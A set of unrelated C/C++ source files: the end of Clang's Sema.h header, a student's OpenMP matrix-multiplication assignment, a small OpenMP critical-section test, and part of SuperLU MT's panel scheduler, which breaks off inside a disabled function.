void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckCDEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMCoprocessorImmediate(const Expr *CoprocArg, bool WantCDE);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains 'break' or 'continue'
/// statement that produces control flow different from GCC.
void CheckBreakContinueBinding(Expr *E);
/// Check whether receiver is mutable ObjC container which
/// attempts to add itself into the container
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Peform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field
/// as this may be a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
/// Retrieve the keyword associated
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// Determine the number of levels of enclosing template parameters. This is
/// only usable while parsing. Note that this does not include dependent
/// contexts in which no template parameters have yet been declared, such as
/// in a terse function template or generic lambda before the first 'auto' is
/// encountered.
unsigned getTemplateDepth(Scope *S) const;
/// To be used for checking whether the arguments being passed to
/// function exceeds the number of parameters expected for it.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks if the expression is in the sef of potentially
/// misaligned members and it is converted to some pointer type T with lower
/// or equal alignment requirements. If so it removes it. This is used when
/// we do not want to diagnose such misaligned access (e.g. in conversions to
/// void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
prog1.c | /*
Copyright (c) 2017 Rob Gillen
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <argp.h>
#include <inttypes.h>
#include <time.h>
#include <omp.h>
const char *argp_program_version = "prog1 1.0";
const char *argp_program_bug_address = "<regillen42@students.tntech.edu>";
/* Program documentation. */
static char doc[] = "CSC6740 Assignment 1 -- Matrix Multiplication with OpenMP";
/* The options we understand. */
static struct argp_option options[] = {
{"size", 's', "SIZE", 0, "Size of a matrix side (e.g. M x M)"},
{"threads", 't', "THREADS", 0, "Number of threads to utilize"}
};
// hold our command line arguments
struct arguments {
int matrix_size;
int thread_count;
};
// my parser function
static error_t parse_opt (int key, char *arg, struct argp_state *state)
{
struct arguments *arguments = state->input;
switch (key)
{
case 's':
arguments->matrix_size = arg ? atoi (arg) : 10;
break;
case 't':
arguments->thread_count = arg ? atoi (arg) : 10;
break;
default:
return ARGP_ERR_UNKNOWN;
}
return 0;
}
// my argp parser
static struct argp argp = { options, parse_opt, 0, doc };
double build_good_random() {
return ((float)rand()/(float)(RAND_MAX)) * 1024;
}
int main(int argc, char **argv) {
struct arguments arguments;
arguments.matrix_size = 0;
arguments.thread_count = 0;
argp_parse(&argp, argc, argv, 0, 0, &arguments);
printf("\n");
printf("***********************************************\n");
printf("* Matrix Math with OpenMP\n");
printf("* \n");
printf("* Using %i threads\n", arguments.thread_count);
printf("* Matrix size: %i x %i\n", arguments.matrix_size, arguments.matrix_size);
printf("*\n\n");
if ((arguments.matrix_size <= 0) || (arguments.thread_count <= 0)) {
fprintf(stderr, "\n[ERROR] You must specify a matrix size and thread count greater than zero\n");
exit(1);
}
// generate the matrices (e.g. 10x10 should be double[100], and in row-major format)
double total_size = arguments.matrix_size*arguments.matrix_size;
double *m1 = malloc (sizeof(double)*total_size);
double *m2 = malloc (sizeof(double)*total_size);
double *a1 = malloc (sizeof(double)*total_size);
double *a2 = malloc (sizeof(double)*total_size);
// double m1[9];
// double m2[9];
// double a1[9];
// double a2[9];
// m1[0] = 1;
// m1[1] = 2;
// m1[2] = 3;
// m1[3] = 4;
// m1[4] = 5;
// m1[5] = 6;
// m1[6] = 7;
// m1[7] = 8;
// m1[8] = 9;
// m2[0] = 9;
// m2[1] = 8;
// m2[2] = 7;
// m2[3] = 6;
// m2[4] = 5;
// m2[5] = 4;
// m2[6] = 3;
// m2[7] = 2;
// m2[8] = 1;
for (int i = 0; i < arguments.matrix_size*arguments.matrix_size; i++) {
m1[i] = build_good_random();
m2[i] = build_good_random();
}
// print the matrix (row major)
// printf("MATRIX #1\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", m1[index]);
// }
// printf("\n");
// }
// printf("\nMATRIX #2\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", m2[index]);
// }
// printf("\n");
// }
int side_len = arguments.matrix_size;
// ok... let's do it the hard way...
// printf("Running Serial Calculations\n");
// // double counter = 0;
// for (int i = 0; i < side_len; i++) {
// for (int j = 0; j < side_len; j++) {
// double answer = 0;
// for (int k = 0; k < side_len; k++) {
// answer += m1[(side_len*i) + k] * m2[(side_len*k) + j];
// }
// a1[(side_len*i) + j] = answer;
// }
// }
printf("Running Parallel Calculations\n");
// set the number of threads
omp_set_num_threads(arguments.thread_count);
// arguments.thread_count
// set up the parallel branch
#pragma omp parallel
{
// calculate the range (into i) for this particular thread
int ID = omp_get_thread_num();
int split = side_len / arguments.thread_count;
int min = split * ID;
int max = min + split;
// printf("MIN for %d: %d\n", ID, min);
// printf("MAX for %d: %d\n", ID, max);
// do it just like before, but only our part (data parallel)
for (int i = min; i < max; i++) {
for (int j = 0; j < side_len; j++) {
double answer = 0;
for (int k = 0; k < side_len; k++) {
answer += m1[(side_len*i) + k] * m2[(side_len*k) + j];
}
a1[(side_len*i) + j] = answer;
}
}
}
// printf("\nRESULTS\n");
// for (int i = 0; i < arguments.matrix_size; i++) {
// for (int j = 0; j < arguments.matrix_size; j++) {
// int index = (arguments.matrix_size * i) + j;
// printf("%f\t", a1[index]);
// }
// printf("\n");
// }
// printf("\n%0.0f total operations\n", counter);
printf("\n");
free(m1);
free(m2);
free(a1);
free(a2);
exit (0);
}
|
CriticalEndLink.c | int x;
int main () {
#pragma omp critical
{
11;
}
#pragma omp critical
{
int x;
}
}
|
pxgstrf_scheduler.c | /*! \file
Copyright (c) 2003, The Regents of the University of California, through
Lawrence Berkeley National Laboratory (subject to receipt of any required
approvals from U.S. Dept. of Energy)
All rights reserved.
The source code is distributed under BSD license, see the file License.txt
at the top-level directory.
*/
#include "slu_mt_ddefs.h"
void
pxgstrf_scheduler(const int_t pnum, const int_t n, const int_t *etree,
int_t *cur_pan, int_t *bcol, pxgstrf_shared_t *pxgstrf_shared)
{
/*
* -- SuperLU MT routine (version 1.0) --
* Univ. of California Berkeley, Xerox Palo Alto Research Center,
* and Lawrence Berkeley National Lab.
* August 15, 1997
*
* Purpose
* =======
*
* pxgstrf_scheduler() gets a panel for the processor to work on.
* It schedules a panel in decreasing order of priority:
* (1) the current panel's parent, if it can be done without pipelining
* (2) any other panel in the queue that can be done without pipelining
* ("CANGO" status)
* (3) any other panel in the queue that can be done with pipelining
* ("CANPIPE" status)
*
* Arguments
* =========
* pnum (input) int_t
* Processor number.
*
* n (input) int_t
* Column dimension of the matrix.
*
* etree (input) int_t*
* Elimination tree of A'*A, size n.
* Note: etree is a vector of parent pointers for a forest whose
* vertices are the integers 0 to n-1; etree[root] = n.
*
* cur_pan (input/output) int_t*
* On entry, the current panel just finished by this processor;
* On exit, [0, n-1]: the new panel to work on;
* EMPTY: failed to get any work, will try later;
* n: all panels are taken; ready to terminate.
*
* taskq (input/output) queue_t*
* Global work queue.
*
* fb_cols (input/output) int_t*
* The farthest busy descendant of each (leading column of the) panel.
*
* bcol (output) int_t*
* The most distant busy descendant of cur_pan in the *linear*
* pipeline of busy descendants. If all proper descendants of
* cur_pan are done, bcol is returned equal to cur_pan.
*
* Defining terms
* ==============
* o parent(panel) = etree(last column in the panel)
* o the kids of a panel = collective kids of all columns in the panel
* kids[REP] = SUM_{j in panel} ( kids[j] )
* o linear pipeline - what does it mean in the panel context?
* if ukids[REP] = 0, then the panel becomes a leaf (CANGO)
* if ukids[REP] = 1 && ukids[firstcol] = 1, then the panel can
* be taken with pipelining (CANPIPE)
*
* NOTES
* =====
* o When a "busy" panel finishes, if its parent has only one remaining
* undone child there is no check to see if the parent should change
* from "unready" to "canpipe". Thus a few potential pipelinings will
* be lost, but checking out this pipeline opportunity may be costly.
*
*/
register int_t dad, dad_ukids, jcol, w, j;
int_t *fb_cols = pxgstrf_shared->fb_cols;
queue_t *taskq = &pxgstrf_shared->taskq;
Gstat_t *Gstat = pxgstrf_shared->Gstat;
#ifdef PROFILE
double t;
#endif
jcol = *cur_pan;
if ( jcol != EMPTY ) {
#ifdef DOMAINS
if ( in_domain[jcol] == TREE_DOMAIN )
dad = etree[jcol];
else
#endif
dad = DADPANEL (jcol);
}
/* w_top = sp_ienv(1)/2;
if ( w_top == 0 ) w_top = 1;*/
#ifdef PROFILE
TIC(t);
#endif
#if ( MACH==SUN )
mutex_lock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==DEC || MACH==PTHREAD )
pthread_mutex_lock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==SGI || MACH==ORIGIN )
#pragma critical lock(pxgstrf_shared->lu_locks[SCHED_LOCK])
#elif ( MACH==CRAY_PVP )
#pragma _CRI guard SCHED_LOCK
#elif ( MACH==OPENMP )
#pragma omp critical ( SCHED_LOCK )
#endif
{ /* ---- START CRITICAL SECTION ---- */
/* Update the status of the current panel and its parent, so that
* the other processors waiting on it can proceed.
* If all siblings are done, and dad is not busy, then take dad.
*/
if ( jcol != EMPTY ) { /* jcol was just finished by this processor */
dad_ukids = --pxgstrf_shared->pan_status[dad].ukids;
#if ( DEBUGlevel>=1 )
printf("(%d) DONE %d in Scheduler(), dad %d, STATE %d, dad_ukids %d\n",
pnum, jcol, dad, STATE(dad), dad_ukids);
#endif
if ( dad_ukids == 0 && STATE( dad ) > BUSY ) { /* dad not started */
jcol = dad;
#if ( DEBUGlevel>=1 )
printf("(%d) Scheduler[1] Got dad %d, STATE %d\n",
pnum, jcol, STATE(dad));
#endif
#ifdef PROFILE
++(Gstat->panhows[DADPAN]);
#endif
} else {
/* Try to get a panel from the task Q. */
while ( 1 ) {
/*>>if ( (j = Dequeue(taskq, &item)) == EMPTY ) {*/
if ( taskq->count <= 0 ) {
jcol = EMPTY;
break;
} else {
jcol = taskq->queue[taskq->head++];
--taskq->count;
if ( STATE( jcol ) >= CANGO ) { /* CANGO or CANPIPE */
#if ( DEBUGlevel>=1 )
printf("(%d) Dequeue[1] Got %d, STATE %d, Qcount %d\n",
pnum, jcol, STATE(jcol), j);
#endif
#ifdef PROFILE
if (STATE( jcol ) == CANGO) ++(Gstat->panhows[NOPIPE]);
else ++(Gstat->panhows[PIPE]);
#endif
break;
}
}
} /* while */
}
} else {
/*
* jcol was EMPTY; Try to get a panel from the task Q.
*/
while ( 1 ) {
/*>>if ( (j = Dequeue(taskq, &item)) == EMPTY ) {*/
if ( taskq->count <= 0 ) {
jcol = EMPTY;
break;
} else {
jcol = taskq->queue[taskq->head++];
--taskq->count;
if ( STATE( jcol ) >= CANGO ) { /* CANGO or CANPIPE */
#if ( DEBUGlevel>=1 )
printf("(%d) Dequeue[2] Got %d, STATE %d, Qcount %d\n",
pnum, jcol, STATE(jcol), j);
#endif
#ifdef PROFILE
if (STATE( jcol ) == CANGO) ++(Gstat->panhows[NOPIPE]);
else ++(Gstat->panhows[PIPE]);
#endif
break;
}
}
} /* while */
}
/*
* Update the status of the new panel "jcol" and its parent "dad".
*/
if ( jcol != EMPTY ) {
--pxgstrf_shared->tasks_remain;
#ifdef DOMAINS
if ( in_domain[jcol] == TREE_DOMAIN ) {
/* Dequeue the first descendant of this domain */
*bcol = taskq->queue[taskq->head++];
--taskq->count;
} else
#endif
{
STATE( jcol ) = BUSY;
w = pxgstrf_shared->pan_status[jcol].size;
for (j = jcol; j < jcol+w; ++j) pxgstrf_shared->spin_locks[j] = 1;
dad = DADPANEL (jcol);
if ( dad < n && pxgstrf_shared->pan_status[dad].ukids == 1 ) {
STATE( dad ) = CANPIPE;
/*>> j = Enqueue(taskq, dad);*/
taskq->queue[taskq->tail++] = dad;
++taskq->count;
#if ( DEBUGlevel>=1 )
printf("(%d) Enqueue() %d's dad %d ->CANPIPE, Qcount %d\n",
pnum, jcol, dad, j);
#endif
}
#ifdef PROFILE
Gstat->procstat[pnum].panels++;
#endif
/* Find the farthest busy descendant of the new panel
and its parent.*/
*bcol = fb_cols[jcol];
#if ( DEBUGlevel>=1 )
printf("(%d) Scheduler[2] fb_cols[%d]=%d, STATE %d\n",
pnum, jcol, *bcol, STATE( *bcol ));
#endif
while ( STATE( *bcol ) == DONE ) *bcol = DADPANEL (*bcol);
fb_cols[dad] = *bcol;
} /* else regular_panel */
} /* if jcol != empty */
*cur_pan = jcol;
#if ( DEBUGlevel>=1 )
printf("(%d) Exit C.S. tasks_remain %d, cur_pan %d\n",
pnum, pxgstrf_shared->tasks_remain, jcol);
#endif
} /* ---- END CRITICAL SECTION ---- */
#if ( MACH==SUN )
/* Exit C.S. */
mutex_unlock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==DEC || MACH==PTHREAD )
pthread_mutex_unlock( &pxgstrf_shared->lu_locks[SCHED_LOCK] );
#elif ( MACH==CRAY_PVP )
#pragma _CRI endguard SCHED_LOCK
#endif
#ifdef PROFILE
Gstat->procstat[pnum].cs_time += SuperLU_timer_() - t;
#endif
return;
}
/* @@@@@@@@@@@@@@ not called @@@@@@@@@@@@@@@@@@ */
#if 0
/* Fix the order of the panels to be taken. */
void
Preorder(const int_t pnum, const int_t n, const int_t *etree, int_t *cur_pan,
queue_t *taskq, int_t *fb_cols, int_t *bcol,
pxgstrf_shared_t *pxgstrf_shared)
{
register int_t w, dad, dad_ukids;
#undef POSTORDER
#ifdef POSTORDER
if ( *cur_pan == EMPTY ) {
*cur_pan = 0;
} else {
w = pxgstrf_shared->pan_status[*cur_pan].size;
*cur_pan += w;
}
#else /* Breadth-first bottom up */
if ( *cur_pan != EMPTY ) {
dad = DADPANEL (*cur_pan);
dad_ukids = --pxgstrf_shared->pan_status[dad].ukids;
if ( dad_ukids == 0 ) {
taskq->queue[taskq->tail++] = dad;
++taskq->count;
}
}
